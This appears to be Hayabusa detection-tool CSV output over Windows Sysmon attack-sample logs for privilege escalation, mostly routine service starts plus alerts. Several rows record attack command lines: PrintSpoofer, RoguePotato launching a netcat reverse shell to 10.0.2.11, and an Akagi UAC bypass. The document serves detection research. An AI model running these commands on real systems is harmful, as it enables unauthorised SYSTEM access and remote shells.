C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.764 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.836 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetSvcs -p -s iphlpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.838 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.855 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k utcsvc -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.065 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.068 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s SstpSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.079 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe : Path: C:\Windows\System32\wlms\wlms.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.080 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,Rule: PrivEsc - Potential Unquoted Service Exploit : Command: c:\Program Files\vulnsvc\mmm.exe : Path: C:\program.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.086 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.096 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.465 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalService -p -s WdiServiceHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:32.050 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: sihost.exe : Path: C:\Windows\System32\sihost.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:32.058 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc : Path: C:\Windows\System32\svchost.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:32.097 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService : Path: C:\Windows\System32\svchost.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:32.358 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:35.125 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: MSEDGEWIN10\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:35.236 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:37.209 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:40.692 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:40.712 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications : Path: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\RuntimeBroker.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:11.341 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:11.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6964 318 0000021FF2606500 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:11.516 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:16.073 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Discovery - domain time : Command: ""C:\BGinfo\BGINFO.EXE"" /accepteula /ic:\bginfo\bgconfig.bgi /timer:0 : Path: C:\BGinfo\BGINFO.EXE : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:16.165 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\SecurityHealthService.exe : Path: C:\Windows\System32\SecurityHealthService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:16.965 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe -Embedding : Path: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:18.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe"" /background : Path: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:21.251 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\regedit.exe"" : Path: C:\Windows\regedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:21.263 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6964 258 0000021FF266EC20 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:26.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\regedit.exe"" : Path: C:\Windows\regedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:21:08.564 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:21:18.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:21:19.340 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s WinRM : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:21:19.629 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-05-03 03:01:54.855 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: PrintSpoofer.exe -i -c powershell.exe : Path: C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-03 03:01:54.863 +09:00,MSEDGEWIN10,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: powershell.exe : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: NT AUTHORITY\SYSTEM : Parent Command: PrintSpoofer.exe -i -c powershell.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: powershell.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-07 22:13:02.481 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\ChangePk.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx -2020-05-10 09:09:36.635 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe"" : Path: C:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx -2020-05-10 09:09:36.709 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx -2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx -2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx -2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx -2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx -2020-05-10 09:11:16.714 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx -2020-05-12 08:21:56.493 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999 : Path: C:\Users\IEUser\Tools\PrivEsc\RoguePotato.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx -2020-05-12 08:21:56.519 +09:00,MSEDGEWIN10,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx -2020-05-12 08:21:56.562 +09:00,MSEDGEWIN10,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx -2020-05-12 08:21:56.587 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe : Path: C:\Users\IEUser\Tools\Misc\nc64.exe : User: NT AUTHORITY\SYSTEM : Parent Command: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx -2020-05-12 08:21:56.661 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx -2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx -2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx -2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx -2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: Akagi.exe 58 c:\Windows\System32\cmd.exe : Path: C:\Users\IEUser\Tools\PrivEsc\Akagi.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx -2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx -2020-05-13 00:06:49.211 